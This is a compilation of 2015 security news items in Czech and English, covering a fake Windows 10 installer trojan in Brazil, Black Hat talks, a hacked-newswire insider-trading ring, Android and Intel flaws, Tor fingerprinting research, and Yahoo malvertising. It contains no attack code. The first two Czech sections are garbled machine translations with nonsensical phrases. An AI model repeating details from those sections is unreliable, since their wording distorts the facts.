Vzhledem k vysoké poptávce pro Windows 10, Microsoft vydává ji postupně. To se týká zejména některých zemích. Oficiální web Microsoft Brazílie jej (levý obrázek) potvrzuje. Počítačoví zločinci z Brazílie využili této a běží spam kampaň shodnou s oficiálním designu nabízí falešnou volbu pro uživatele, aby "dostat svou kopii teď". (Pravý obrázek)

win_1

Když oběť klikne na "Instalador Windows 10" (Windows Installer) 10, stáhne do systému zakódován VBE skriptu:

win_2

win_3

To je base64 skript, pomocí zákonný Motobit software pro kódování:

win_4

Jakmile běží, to klesne hlavní Trojan-špionážní komponentu do systému. Oni také používají vtipné brazilská portugalština slang přímo v kódu.

win_5

Upustil hlavní bankou modul obsahuje funkce pro krást data z stisky kláves a schránky. Navíc, to má backdoor funkce pro vzdálené relace a několik anti-VM, techniky ladění.

Kaspersky Anti-Virus zjistí původní scénář VBE jako Trojan-Downloader.VBS.Agent.aok

V poslední době jsme zaznamenali velký nárůst VBS / VBE malware v Brazílii, můj kolega Fabio Assolini pracuje na BLOGPOST asi VBE malware široce rozšířen v Brazílii nyní.


Blackhat USA a Defcon 2015
12.8.2015 Konference

Blackhat a Defcon 2015ar se koná v Las Vegas v tomto roce ve městě Mandalay Bay a Paříži, s 9000 lidmi v Blackhat účasti a další na Defcon. Zatímco navštěvuje blackhat je mnohem dražší, jste téměř jisti si místo na jednání máte v úmyslu na navštěvovat. V Defcon, se zdá, že většina účastníků byli ujištěni čekat ve frontě na nejvíc chybí z rozhovorů, které mají zájem, s jinými lidé křičí o tom v halách. Organizátoři DEFCON zvolili nové místo konání konference v letošním roce, a je třeba jej opravit.

bh_escalator

Blackhat měl další fantastický lineup s některými ohromující obsah, jako v minulých letech . Široká škála témat byly představeny letos a našli jsme několik velmi zajímavé. Možná již nalézt nástroje na GitHub a papíry a skluzavky pro mnoho prezentace na blackhat.com. Můžeme očekávat, že videa z těchto rozhovorů na youtube v blízké budoucnosti. Organizátoři DEFCON budou nahrát příval rozhovorů, jak činili v minulých letech:

čtyři z rozhovorů se točila kolem hypervisor implementací a související obsah, včetně silných a slabých stránek současné i budoucí bezpečnostní architektury Windows10 závislých na hypervisoru a firmware systému. Pass-the-hash a zlaté a stříbrné obranu vstupenek, Windows 10 pověření Guard a ostatní služby jsou postaveny na předpokladu důvěryhodného zavazadlového prostoru
Kód průmyslový PLC injekce s kódem STL Socks Proxy a STL SNMP skener pro plné průmyslové sítě kompromisu, zneužívání internetu čelí PLC
unpatchable globální zranitelnosti v simplex SATCOM protokolu Globalstar GPS, ovlivňuje vojenské, SCADA sítě, komunikace první odpověď a doprava
nová třída eskalace privilegium x86 prstenci -2 zranitelnosti pouze opravené 2013+ procesory Intel, odcházející 100000000, že nelze opravit


Hack-Fueled ‘Unprecedented’ Insider Trading Ring Nets $100M

12.8.2015

Hackers based in Ukraine and Russia allegedly broke into servers belonging to several newswires and passed sensitive information onto an underground trading ring as part of what’s being referred to as an unprecedented new level of insider trading. Prosecutors claimed Tuesday that corporate information gleaned in the hacks was funneled to a sophisticated insider trading ring that earned those involved nearly $100 million. In a press conference Tuesday morning Mary Jo White, the Chairwoman of the U.S. Securities and Exchange Commission, maintained that given the number of hackers, traders, and profit involved, the case is “unprecedented.” Prosecutors with the U.S. Attorney’s office in New Jersey initially announced the indictment of nine people, five of whom were arrested in Georgia and Pennsylvania, Tuesday morning. A follow-up announcement in Newark revealed that 32 people connected to the scheme in total were facing charges. According to Reuters, it’s the first time that prosecutors have brought criminal charges against individuals for perpetrating a securities fraud scheme involving hacked insider information. The hackers purportedly infiltrated servers belonging to press release agencies: PRNewswire Association, Marketwire, and the Berkshire Hathaway subsidiary Business Wire, first accessing the newswires’ networks as early as 2010. Once they were in, over the course of five years, the hackers passed along sensitive information – some of which pertained to large Fortune 500 companies – to traders, who then used it to their benefit. A related SEC complaint filed in tandem with the indictments notes that civil charges are being brought against 32 individuals and claims the hackers used “malicious programming code and other deceptive techniques to hack into the computer systems.” According to a 57 page long indictment filed in the U.S. District Court of New Jersey, five men were charged, including hackers Ivan Turchynov and Oleksandr Ieremenko, and traders Arkadiy Dubovoy, Igor Dubovoy, and Pavel Dubovoy. In a separate indictment filed in a New York federal court in Brooklyn, prosecutors charged four additional traders: Vitaly Korchevsky of Pennsylvania; Vladislav Khalupsky of Brooklyn and Odessa, Ukraine, and Leonid Momotok and Alexander Garkusha of Georgia. The traders used the information, which wasn’t yet public, to buy and sell shares. More than 150,000 press releases, some involving international, high profile companies like Viacom, Netflix, Home Depot, Hewlett-Packard, Boeing, and Oracle, were shared amongst the group. Once the traders received press releases regarding companies, they did business quickly. “In order to execute their trades before the Stolen Releases were made public, the Trader Defendants and other co-conspirators sometimes executed trades in very short windows of time between when the Hacker Defendants illegally access and shared the Stolen Releases and when the press releases were disseminated to the public by Victim Newswires,” reads one part of the New Jersey-based indictment. Hackers leveraged stolen credentials and used a series of reverse shells, brute force attacks, and SQL injection attacks to penetrate the agencies’ networks, according to the indictments. The indictment filed in New Jersey initially claimed the conspiracy netted those involved over $30 million in “illicit trading profits” but those figures were later upped to $100 million in a press conference Tuesday morning led by White and Homeland Security Secretary’s Jeh Johnson.


Windows 10 už dostal první záplatu zabezpečení

12.8.2015 Zranitelnosti
Windows 10 už dostal první záplatu zabezpečeníDnes, Jan Pánek, aktualitaV rámci tradičního úterý, kdy operační systémy od Microsoftu dostávají aktualizace, se první dostaly i na Windows 10. Jednalo se i o bezpečnost, některé z aktualizací byly dokonce označeny jako vážné. Jsou to teprve dva týdny od vydání Windows 10 a Microsoft už vydal první aktualizace, které zlepší zabezpečení. Pět z nich je určených přímo pro Windows, další jsou určeny pro i pro Edge nebo MS Office.

Microsoft vydal celkem 14 oprav při příležitosti 2. úterý v měsíci. Wolfgang Kandek, šéf IT firmy Qualys, poznamenal, že Windows 10 zažívají velmi dobrý start, co se bezpečnosti týče. Windows 8 se podle něj první dva měsíce potýkaly s vážnými bezpečnostními problémy.

Záplata na MS Office, MS15-081, je nezvyklá. Řeší totiž opravdu velkou chybu, která útočníkovi umožňuje přebrat kontrolu nad zařízením. A to díky otevření zavirovaného dokumentu Word.

Aktualizace MS15-085 znemožňuje využít zranitelnosti, která útočníkům umožňovala získat přístup do systému díky škodlivému kódu na USB flash disku. Ze snahy Microsoftu lze vyčíst, že pro uživatele bude bezpečné, když na nové Windows 10 přejdou i dříve.


Na ochranu tuzemských firemních stanic se dávají stovky milionů korun ročně

12.8.2015 IT
Celkem 19,8 milionů (zhruba půl miliardy korun) dolarů vloni podle Gartneru utratily české organizace za platformy pro ochranu firemních klientských systémů (Endpoint Protection Platform Enterprise).
Na ochranu tuzemských firemních stanic se dávají stovky milionů korun ročně

Největším prodejcem za loňský rok je přitom Eset – její podíl podle Gartneru dosáhl dominantní výše téměř 40 %.

Podíl dalšího prodejce v pořadí, firmy IBM, je 7,4 %, podobně je na tom i celkově třetí Trend Micro. Dalšími dodavateli umístěnými v žebříčku Top 5 je ještě Symantec a Bitdefender.

Roztříštěnosti trhu napovídá i podíl kategorie ostatní, která se na celkovém obratu podílí téměř dvěma pětinami.

Prodeje Endpoint protection platform enterprise v tuzemsku

Podíl dodavatelů podle obratu, rok 2014

Eset
39,1 %
IBM
7,4 %
Trend Micro
7,1 %
Symantec
5,5 %
Bitdefender
4,8 %
Ostatní
36,1 %
Zdroj: Gartner, Q1 2015

Na výsledcích se významně podepisuje vliv kurzu amerického dolaru vůči koruně, která podobně jako ostatní měny v regionu včetně eura v nedávné minulosti významně oslabila.

Níže je uvedená tabulka předpovědí obratu s řešeními Endpoint Protection Platform Enterprise pro následující roky, a to jak s výsledky při aktuálním kurzu dolaru, tak při vyloučení kurzovních změn dolaru.

Endpoint protection platform enterprise
Odhad vývoje trhu v ČR (miliony dolarů)
2014
2015
2016
2017
2018
Obrat (miliony dolarů)
20,1
19
19,3
19,6
19,7
Růst (%)
-1,19%
-5,22%
1,61%
1,08%
0,73%
Obrat (miliony dolarů) v konstatním měnovém přepočtu
21,3
21,8
22,2
22,4
22,6
Růst (%) v konstatním měnovém přepočtu
4,88%
2,34%
1,61%
1,08%
0,73%

Zdroj: Gartner, Q1 2015

Poznámka: Údaje odhadu a výsledků roku 2014 se mírně liší vzhledem ke kurzovým změnám v době uveřejnění


A další úspěšný útok na automobil. Tentokrát pomocí SMS

12.8.2015 Hacking

Na sklonku července prolétla internetem zpráva o úspěšném hackerském útoku na automobil Jeep Cherokee s palubním počítačem Uconnect připojeným k internetu. Chrysler poté musel svolat 1,4 milionu vozů k servisní aktualizaci firmwaru.

Rozhodně se nejednalo o ojedinělý případ, několik málo týdnů poté se totiž svým kouskem pochlubili i specialisté z Kalifornské univerzity v San Diegu. Na konferenci Usenix demonstrovali úspěšný útok na automobilový diagnostický systém CAN skrze GSM modul a běžné zprávy SMS. Svoji techniku ukázali na Chevroletu Corvette vybaveném všem potřebným.

Vůz se sběrnicí CAN byl vybavený telefonním modulem pro potřeby pojišťovny, jejíž operátorka pak může jednoduchým příkazem v případě potíží poslat do vozu třeba příkaz k okamžitému zastavení (třeba v případě infarktu řidiče, kdy spolujezdec stiskne tlačítko asistenčního alarmu aj.). Inženýři tedy použili podobnou techniku a posílali do vozu vlastní zprávy.


Nástroje Hacking Teamu začali hojně využívat hackeři - i pro slídění hotelové Wi-Fi

11.8.2015 Incidenty
Kybernetická špionážní kampaň Darkhotel a řada skupin útočících pomocí slabin v Adobe Flash Playeru a OS Windows využívá nástroje od společnosti Hacking Team. Ta poskytuje „legální spyware“ řadě vlád a státních policejních složek.

Zneužití špionážních programů Hacking Teamu následovalo po úniku souborů firmy, které se dostaly na veřejnost na začátku léta.

Analytici Kaspersky Lab objevili elitní špionážní jednotku Darkhotel v roce 2014. Skupina infiltrovala Wi-Fi sítě v luxusních hotelech, aby mohla sledovat vybrané vysoce postavené manažery. Od července k tomu využívala zero-day zranitelnost ze sbírky Hacking Teamu, hned po jejím zveřejnění 5. 7. 2014.

Vzhledem k tomu, že Darkhotel nefiguroval mezi zákazníky Hacking Teamu, zdá se, že soubory zneužil až po jejich úniku na veřejnost.

Není to přitom jediná zero-day zranitelnost využívaná skupinou Darkhotel. Podle odhadů v posledních letech probrali několik zero-day zranitelností Adobe Flash Playeru a pravděpodobně do tohoto arzenálu investovali velké finanční prostředky.

V roce 2015 Darkhotel rozšířil působnost po celém světě a pomocí spearphishingu zacílil na Severní a Jižní Koreu, Rusko, Japonsko, Bangladéš, Thajsko, Indii, Mosambik a Německo.

Při útocích v roce 2014 a dříve skupina zneužila podpisové certifikáty a zapojila neobvyklé metody, jako bylo nabourání se do hotelových Wi-Fi sítí. V roce 2015 je využívali dále, ale analytici odhalili mimo jiné i nové varianty spustitelných souborů, využití sociálního inženýrství a zapojení zero-day zranitelnosti od Hacking Teamu.

Od loňského roku skupina pracovala na vylepšení obranných technik, například na rozšíření technologie proti odhalení. Verze Darkhotel downloaderu pro rok 2015 je navržena tak, aby identifikovala antivirová řešení od 27 výrobců s cílem je obejít.


IBM objevilo další díru v Androidu, týká se víc jak poloviny uživatelů

11.8.2015 Zranitelnosti
Bezpečnostní výzkumníci společnosti IBM objevili způsob, jakým lze díky bezpečnostní chybě v Androidu nabourat až pětapadesát procent chytrých telefonů běžících právě na oblíbeném systému.

„Řečeno v kostce, pokročilý hacker může využít této mezery, nainstalovat do telefonu škodlivou aplikaci a zařízení zcela ovládnout,“ píše ve své zprávě bezpečnostní tým IBM s označením X-Force Application Security Research Team.

Nově objevená chyba se týká Androidů verzí 4.3 – 5.1, tedy kromě Jelly Bean a Lollipop taky nejrozšířenějších KitKatů, které běží na více než třetině všech zařízení s Androidem. Mezera je obsažena v certifikátu OpenSSL X509 a může být zneužita v rámci komunikace mezi aplikacemi a webovými službami, do které zdatný hacker snadno vloží škodlivý kód.

Prostřednictvím shell příkazů pak může ukrást data z kterékoliv nainstalované aplikace a na některých zařízeních dokonce modifikovat základní program operačního systému.

V praxi útok vypadá tak, že útočník do ovládnutého mobilního zařízení nainstaluje falešnou aplikaci (IBM simulovaný útok prezentovalo na Facebooku), která se tváří jako pravá, tudíž uživatel má minimální šanci poznat, že se stal obětí útoku, zatímco hacker bez potíží krade jeho data.

Škodlivý kód, kterým lze telefony nabourat, výzkumníci nezveřejnili a zároveň tlumí případné obavy. Podle nich není důvod k panice. Nejen proto, že k dispozici už je patch, ale také proto, že případů, kdy by byl kód využit, se zatím neobjevilo mnoho. Na druhou stranu, případný útok je prý tak důmyslný, že díky němu lze přelstít i ty nejsvědomitější uživatele dbající na bezpečnost svých zařízení.


Starší procesory Intel jsou zranitelné. Umožňují trvale infikovat PC

10.8.2015 Zranitelnosti

Na bezpečnostní konferenci Black Hat 2015 výzkumníci a hackeři prezentují své objevy týkající se nových možností napadení různorodých systémů. A pozornost tu nevzbudil jen případ napadeného automobilu. Starší procesory od Intelu totiž doběhla minulost, kdy byl odhalen vážný nedostatek v jejich zabezpečení, datovaný ještě do roku 1997. Na informaci upozornil web PC World.

Nově odhalenou zranitelnost v x86 architektuře procesorů zveřejnil bezpečnostní výzkumník Christopher Domas. Díra v zabezpečení umožňuje manipulaci s kritickým bezpečnostním prvkem SMM (System Management Mode). Jelikož zranitelnost je na úrovni firmwaru samotného procesoru, problém umožňuje vytvoření účinného rootkitu, který nedokáže detekovat žádné standardní antivirové řešení.

Co je to Rootkit
Sada speciálních aplikací, které před uživatelem aktivně skrývají svou existenci. Většinou jsou škodlivého charakteru a nejsou odhalitelné běžnými ochrannými prvky, jako například antivirem.

Škodlivý kód může po využití zranitelnosti například vymazat UEFI v zařízení. Co je však důležitější, na jeho odstranění nepostačuje ani vymazání pevného disku a reinstalace operačního systému. Malware nacházející se ve firmwaru totiž umožňuje zařízení znovu infikovat.

Nedostatek se nachází v procesorech Intel vyráběných od roku 1997. Bezpečnostní díra byla záplatování s příchodem generace procesorů Sandy Bridge, začátkem roku 2011. Mobilní čipy Intel Atom jsou odolné od roku 2013. V současnosti údajně probíhá testování i v případě konkurenčního AMD. Ačkoliv zatím neznáme detaily, Domas naznačil, že šance na výskyt obdobné zranitelnosti je v i v tomto případě vysoká.

Vzhledem k tomu, že se zranitelnost týká velkého počtu produktů, které jsou navíc staršího data, můžeme očekávat, že miliony starších zařízení zůstanou bez opravy. To i přesto, že Intel o chybě ví a pro některé modely čipů již vydal aktualizace firmwaru. Na kolik jich však budou aplikovat majitelé starší techniky, zůstává sporné.

Ale panika není na místě. Ani nová díra totiž není dokonalá. Aby mohl útočník aplikovat rootkit, musí nejprve disponovat potřebnými systémovými oprávněními. Reálný útok tak sice zůstává možný, ale pouze v kombinaci s využitím další, samostatné zranitelnosti.


Díra ve Firefoxu umožnila útočníkům získat citlivá data uživatelů

10.8.2015 Zranitelnosti

V internetovém prohlížeči Firefox byla objevena a již také prokazatelně zneužita chyba, která umožňuje javascriptovému kódu číst lokální soubory. Typicky se toho dá zneužít k odcizení souborů obsahující přístupové klíče atp. Chybu Mozilla záhy po objevení opravila, ale uživatelům pro jistotu doporučuje, aby po aktualizaci prohlížeče změnili svá hesla ukládaná lokálně.

Chyba se konkrétně nacházela ve vestavěném prohlížeči PDF dokumentů a byla zneužitelná na všech desktopových platformách. Netýká se mobilní verze, kde není funkce pro čtení PDF k dispozici. Bohužel nelze nijak zjistit, zda byla v počítači chyba zneužita, nezanechává totiž žádné stopy.


"Certifi-Gate" Android Vulnerability Lets Hackers Take Complete Control of Your Device
10.8.2015

Certifi-Gate Android Vulnerability
Android users are busy fighting with Stagefright vulnerability while the popular mobile operating system faces another critical security vulnerability, dubbed as “Certifi-Gate”.
Millions of Android devices could be hacked exploiting a plugin that comes pre-installed on your Android devices by the manufacturers.
Most of the Android device manufacturers pre-install ‘Remote Support Tool (mRST)’ plugin onto their phones that are intended to help users, such as RSupport or TeamViewer.
But, a critical Certifi-Gate security vulnerability in this mRTS plugin allows malicious applications to gain illegitimate privileged access rights, even if your device is not rooted.
"Certifi-Gate" Android security vulnerability
According to Israeli researchers at Check Point, Ohad Bobrov and Avi Bashan, Certifi-Gate Android vulnerability lies in the way Google’s partners (manufacturers) use certificates to sign remote support tools.
Remote support tools often have root level access to Android devices, even if your device is not rooted. Thus any installed app can use Certifi-Gate vulnerability to gain unrestricted device access, including:
screen scraping
keylogging
exfiltrating private information
installing malware apps, and more
The flaw affects thousands of millions of Android devices, and users cannot uninstall the vulnerable plugin from the device because it is part of the core system…
...Ironic, huh?
“An attacker can exploit mRATs to exfiltrate sensitive information from devices such as location, contacts, photos, screen capture, and even recordings of nearby sounds.” Researchers explained in the published paper.
“While analyzing and classifying mRATs, our research team found some apps share common traits with mRST. Known mRAT players include HackingTeam, mSpy, and SpyBubble.”


Shoring up Tor

10.8.2015
Researchers mount successful attacks against popular anonymity network — and show how to prevent them.

With 2.5 million daily users, the Tor network is the world’s most popular system for protecting Internet users’ anonymity. For more than a decade, people living under repressive regimes have used Tor to conceal their Web-browsing habits from electronic surveillance, and websites hosting content that’s been deemed subversive have used it to hide the locations of their servers.
Researchers at MIT and the Qatar Computing Research Institute (QCRI) have now demonstrated a vulnerability in Tor’s design. At the Usenix Security Symposium this summer, they will show that an adversary could infer a hidden server’s location, or the source of the information reaching a given Tor user, by analyzing the traffic patterns of encrypted data passing through a single computer in the all-volunteer Tor network.
Fortunately, the same paper also proposes defenses, which representatives of the Tor project say they are evaluating for possible inclusion in future versions of the Tor software.
“Anonymity is considered a big part of freedom of speech now,” says Albert Kwon, an MIT graduate student in electrical engineering and computer science and one of the paper’s first authors. “The Internet Engineering Task Force is trying to develop a human-rights standard for the Internet, and as part of their definition of freedom of expression, they include anonymity. If you’re fully anonymous, you can say what you want about an authoritarian government without facing persecution.”
Layer upon layer
Sitting atop the ordinary Internet, the Tor network consists of Internet-connected computers on which users have installed the Tor software. If a Tor user wants to, say, anonymously view the front page of The New York Times, his or her computer will wrap a Web request in several layers of encryption and send it to another Tor-enabled computer, which is selected at random. That computer — known as the guard — will peel off the first layer of encryption and forward the request to another randomly selected computer in the network. That computer peels off the next layer of encryption, and so on.
The last computer in the chain, called the exit, peels off the final layer of encryption, exposing the request’s true destination: the Times. The guard knows the Internet address of the sender, and the exit knows the Internet address of the destination site, but no computer in the chain knows both. This routing scheme, with its successive layers of encryption, is known as onion routing, and it gives the network its name: “Tor” is an acronym for “the onion router.”
In addition to anonymous Internet browsing, however, Tor also offers what it calls hidden services. A hidden service protects the anonymity of not just the browser, but the destination site, too. Say, for instance, that someone in Iran wishes to host a site archiving news reports from Western media but doesn’t want it on the public Internet. Using the Tor software, the host’s computer identifies Tor routers that it will use as “introduction points” for anyone wishing to access its content. It broadcasts the addresses of those introduction points to the network, without revealing its own location.
If another Tor user wants to browse the hidden site, both his or her computer and the host’s computer build Tor-secured links to the introduction point, creating what the Tor project calls a “circuit.” Using the circuit, the browser and host identify yet another router in the Tor network, known as a rendezvous point, and build a second circuit through it. The location of the rendezvous point, unlike that of the introduction point, is kept private.
Traffic fingerprinting
Kwon devised an attack on this system with joint first author Mashael AlSabah, an assistant professor of computer science at Qatar University, a researcher at QCRI, and, this year, a visiting scientist at MIT; Srini Devadas, the Edwin Sibley Webster Professor in MIT’s Department of Electrical Engineering and Computer Science; David Lazar, another graduate student in electrical engineering and computer science; and QCRI’s Marc Dacier.
The researchers’ attack requires that the adversary’s computer serve as the guard on a Tor circuit. Since guards are selected at random, if an adversary connects enough computers to the Tor network, the odds are high that, at least on some occasions, one or another of them would be well-positioned to snoop.
During the establishment of a circuit, computers on the Tor network have to pass a lot of data back and forth. The researchers showed that simply by looking for patterns in the number of packets passing in each direction through a guard, machine-learning algorithms could, with 99 percent accuracy, determine whether the circuit was an ordinary Web-browsing circuit, an introduction-point circuit, or a rendezvous-point circuit. Breaking Tor’s encryption wasn’t necessary.
Furthermore, by using a Tor-enabled computer to connect to a range of different hidden services, they showed that a similar analysis of traffic patterns could identify those services with 88 percent accuracy. That means that an adversary who lucked into the position of guard for a computer hosting a hidden service, could, with 88 percent certainty, identify it as the service’s host.
Similarly, a spy who lucked into the position of guard for a user could, with 88 percent accuracy, tell which sites the user was accessing.
To defend against this type of attack, “We recommend that they mask the sequences so that all the sequences look the same,” AlSabah says. “You send dummy packets to make all five types of circuits look similar.”
“For a while, we’ve been aware that circuit fingerprinting is a big issue for hidden services,” says David Goulet, a developer with the Tor project. “This paper showed that it’s possible to do it passively — but it still requires an attacker to have a foot in the network and to gather data for a certain period of time.”
“We are considering their countermeasures as a potential improvement to the hidden service,” he adds. “But I think we need more concrete proof that it definitely fixes the issue.”


Rusové hacknuli e-mailový systém Pentagonu

10.8.2015 Hacking
Rusové hacknuli e-mailový systém Pentagonu7.8.2015, Milan Šurkala, aktualitaAmeričané to se zabezpečením nemají lehké, letos už byl poněkolikáté hacknut nějaký jejich systém. Tentokrát zaútočili Rusové a nabourali se do e-mailového systému Pentagonu. Ten byl raději dočasně vyřazen z provozu. Letos si americké úřady užili už několik útoků na své systémy. Patrně Číňané stáli za útokem, který měl znamenat zcizení dat 4 milionů zaměstnanců americké vlády. Nakonec se ukázalo, že se to týkalo 21,5 milionu osob(!) a zatím nebylo potvrzeno, odkud útok směřoval. Syřané zase napadli webové stránky americké armády. Nyní to byli pro změnu Rusové, kdo napadli e-mailový systém Pentagonu a nabourali se do elektronické pošty 4000 vojenských i civilních zaměstnanců.

Útok se měl odehrát 25. července a od té doby Pentagon tento systém odstavil, aby nebylo napácháno ještě více škod a mohl celou záležitost vyšetřit. Zatím není jasné, zda za útokem stojí ruská vláda nebo jen skupina lidí z Ruska. Útočníci se nedostali k tajným e-mailům a systém by měl být zprovozněn do konce tohoto týdne.


Využijte virtualizaci pro zvýšení bezpečnosti (1)

8.8.2015 Bezpečnost
Organizace zjišťují, že velmi významným motivujícím faktorem pro přijetí virtualizace sítí je zlepšené zabezpečení.

Když lidé přemýšlejí o virtualizaci sítí, uvažují obvykle o rychlejším provisioningu, networkingu, snadnější správě a dalším efektivnějším využití prostředků. Virtualizace sítí však přináší také další velkou výhodu, která není často příliš zmiňovaná – a tou je vyšší úroveň bezpečnosti.

VMware je jednou ze společností, které se snaží uvádět virtualizaci sítí na trh. Jejím produktem považovaným za vlajkovou loď v této oblasti je NSX. Na nedávné konferenci VMworld padla informace, že tato softwarová platforma má už stovky zákazníků a roční prodeje dosahují výše stamilionů dolarů.

Snad nejvíce překvapující ale je, že až 40 % z těchto instalací nebylo motivovaných agilitou NSX a výhodami správy sítí. Namísto toho byla hlavním faktorem pro implementaci právě bezpečnost.

Schopnost NSX dělat mikrosegmentaci síťového provozu a možnost nasadit všudypřítomné virtuální firewally v datovém centru se organizacím zjevně velmi líbí, prohlásili zástupci společnosti VMware.

Hodnotu agility a schopnosti zrychlit vytváření sítě a snadnější správu sítě získá každý, tvrdí Chris King, viceprezident produktového marketingu obchodní divize Sítě a zabezpečení ve VMwaru. „Problém ale spočívá v tom, že jde o poměrně velké sousto.“

Větší organizace, jako jsou například banky nebo některé úřady, používají NSX především k usnadnění správy sítě. Jiné, zejména menší firmy, nalezly výhodu vyplývající z vyšší úrovně zabezpečení. Ochrana dat se tak může stát důvodem pro prvotní využití NSX, uvádí King.

Ochrana vnitřku

Použití virtuální sítě vytváří celou řadu nových příležitostí pro bezpečnostní postupy, které se zaměřují nikoli na ochranu hranice, ale na zabezpečení provozu uvnitř datového centra.

Jedním ze způsobů, jak to NSX dělá, je mikrosegmentace. Část technologie NSX umožňuje snadnější vytváření nových sítí. Dovoluje také přiřadit sítím zásady a povolit v dané síti jen některé typy přenosů.

Pokud se tedy vyskytne hrozba a objeví se pokus o napadení sítě, nebude to možné, protože atak nebude mít potřebná oprávnění. Protože jsou sítě rozdělené do segmentů, tak i v případě, že se útočníkovi podaří dostat se do sítě, nezíská v rámci datového centra úplnou kontrolu a bude limitovaný jedním segmentem sítě.

Další bezpečnostní výhodou, která je spojená s virtuální sítí, je možnost mít virtuální firewally distribuované po celém datovém centru. V tomto nastavení se fyzické nebo virtuální firewally stále používají jako obrana hranice pro tzv. severojižní provoz – data přicházející do prostředí a odcházející z něj.

Pomocí NSX je možné umístit virtuální firewally kdekoliv v celém datovém centru, takže východozápadní provoz mezi servery se také chrání pomocí firewallů.

NSX také umožňuje využívat zabezpečení specifické pro virtuální stroje, při kterém se pravidla firewallů nastaví nejen pro sítě, ale také pro virtuální stroje. Když se tedy změní umístění virtuálních strojů v síti, přesunou se s nimi i odpovídající bezpečnostní zásady.

Konfigurace virtuálních firewallů pro východozápadní přenosy v datovém centru je v tradičnějších konfiguracích technicky možná, ale v praxi je to v podstatě neproveditelné.

Pokaždé, když dojde k vytvoření nové sítě nebo k umístění nového virtuálního stroje do sítě, musel by se hraniční firewall zaktualizovat o nové zásady. Pokud za den dojde ke stovce přesunů virtuálních strojů, muselo by se změnit velké množství pravidel firewallů.

Řešením je obvykle buď neaktualizování pravidel firewallů, nebo najmutí doslova armády správců firewallů. Druhou variantu si ale může dovolit jen velmi málo organizací, takže většina volí první možnost, popisuje King.


Využijte virtualizaci pro zvýšení bezpečnosti (2)

8.8.2015 Bezpečnost
Organizace zjišťují, že velmi významným motivujícím faktorem pro přijetí virtualizace sítí je zlepšené zabezpečení.

Takhle může v praxi vypadat nasazení virtualizace sítí pro zajištění vyššího zabezpečení firemní infrastruktury.

Příklad z praxe

Exostar je středně velký poskytovatel bezpečných hostingových prostředí, který je nadšený potenciálem virtuálních firewallů uvnitř jejich nové infrastruktury vytvořené v pronajatém datovém centru.

Tato společnost má komplexní systém virtuálních sítí LAN a firewallů, které řídí síťový provoz mezi zákazníky společnosti a datovými centry Exostar. V současné době, když přijde nový uživatel, nakonfiguruje Brandon Marrs, inženýr infrastruktury, novou virtuální síť LAN pomocí rozhraní příkazového řádku (CLI), přiřadí jí zásady zabezpečení a nakonfiguruje síťový hardware a fyzické firewally.

Jako součást nové technologie NSX nyní Exostar ověřuje koncept, který by dramaticky zjednodušil celý proces. Nové sítě by se v rámci softwaru NSX snadno vytvářely jen pomocí několika kliknutí prostřednictvím grafického rozhraní.

Jakmile se zprovozní, lze virtuální stroje provozující síť umístit do bezpečnostních skupin s jim přizpůsobenými zásadami. Namísto toho, kdy by se použily fyzické firewally, kterými by procházely přenosy, umožňuje NSX firewally připojit k jednotlivým sítím.

Marrs a jeho tým budou mít díky NSX centrální přehled o všech sítích, budou moci jednoduše spustit nové, přiřadit jim zásady zabezpečení a v případě potřeby je zase vypnout. Už žádná správa pomocí příkazového řádku, jak říká Marrs.

Exostar podle svých slov doufá, že se jí podaří vše postavit na hardwaru Cisco UCS společně se softwarem VMware NSX.

Zaujal vás tento článek? Přehled nejzajímavějších zpráv získáte odebíráním našeho newsletteru »
Možná že největším přínosem této implementace bude flexibilita sítě, předpokládá Marrs. Pokud bude Exostar potřebovat větší kapacitu sítě, potom lze přidat další procesory a paměť a vytvořit více virtuálních sítí.

Alternativou k tomuto přístupu by bylo koupit sadu nových firewallů a umístit je do infrastruktury. Marrs odhaduje, že by jen za hardware jejich firma utratila 100 tisíc dolarů a jejich manuální řízení by si vynutilo další východozápadní přenosy v datovém centru.

„S touto novou infrastrukturou jsme chtěli také snadnější správu a garanci, že budeme mít v případě potřeby bezproblémovou škálovatelnost,“ prohlašuje Marrs.

Brad Casemore, analytik IDC, který sleduje síťové inovace, si myslí, že není nic překvapujícího vidět, že zabezpečení získává na síle jako klíčová hodnota virtualizace sítí.

Některé z prvních význačných nasazení virtualizace síťových technologií se týkaly rozdělování sítí z bezpečnostních důvodů. Když vznikala společnost Nicira (VMware ji nedávno převzal a z jejích technologií udělal základ pro produkt NSX), začalo tuto technologii mnoho poskytovatelů služeb využívat pro její výhody agility.

„Teď se kruh uzavírá,“ popisuje Casemore a dodává, že bezpečnost se znovu stává hnací silou virtualizace sítí.

„Na širším trhu bezpečnost skutečně otevírá dveře pro produkty VMwaru,“ uvádí Casemore. Je to potenciální příklad implementace, která může pomoci technologii NSX překonat propast sahající od raných osvojitelů a poskytovatelů služeb směrem k širšímu spektru podnikového nasazení, uzavírá Casemore.


Malvertisers abused Yahoo’s ad network for days
8.8.2015
A large-scale malvertising attack abusing Yahoo’s ad network has been hitting visitors of the Internet giant's many popular and heavy-traffic sites for nearly a week.

Started on July 28th, the campaign showed malicious ads that would redirect visitors to a site hosting the Angler exploit kit, which would then attempt to exploit an Adobe Flash vulnerability on the victims' computer.

The attack was spotted by Malwarebytes' researchers, who immediately notified Yahoo, and the company put a stop to it.

"As soon as we learned of this issue, our team took action and will continue to investigate this issue," Yahoo noted.

"Unfortunately, disruptive ad behavior affects the entire tech industry. Yahoo has a long history of engagement on this issue and is committed to working with our peers to create a secure advertising experience. We’ll continue to ensure the quality and safety of our ads through our automated testing and through the SafeFrame working group, which seeks to protect consumers and publishers from the potential security risks inherent in the online ad ecosystem.”

Malwarebytes' researchers didn't manage to get the ultimate malicious payload delivered by the exploit kit, but Angler has lately been dropping a mix of ad fraud malware and ransomware. It's also unknown how many users have been victimized.

“This one is a doozey in terms of scale, because it uses Yahoo's properties, which see nearly 7 billion visits per month," commented Kowsik Guruswamy, CTO for Menlo Security.

"The method of the attack is nothing new: Bad actors place ads via Yahoo's network, and the ads direct users to sites that have been compromised and set up to serve malware."

This particular campaign has been stopped by Yahoo, but if you are still running Flash on your system, you should make sure to update it regularly. And if you have been lax in doing that, checking your computer for malware is a good idea.

"The inconvenient truth about the Web is that it's dangerous and it's not the kind of place you should go without effective protection. There's no way to stop cyber criminals from attacking, and there's no way to detect and stop all of their attacks. The only way to be safe is to execute *all* Web content away from your endpoint so it can't do harm even if it's malicious. That's what isolation security is all about, and it seems pretty clear that its time has come,” noted Guruswamy.

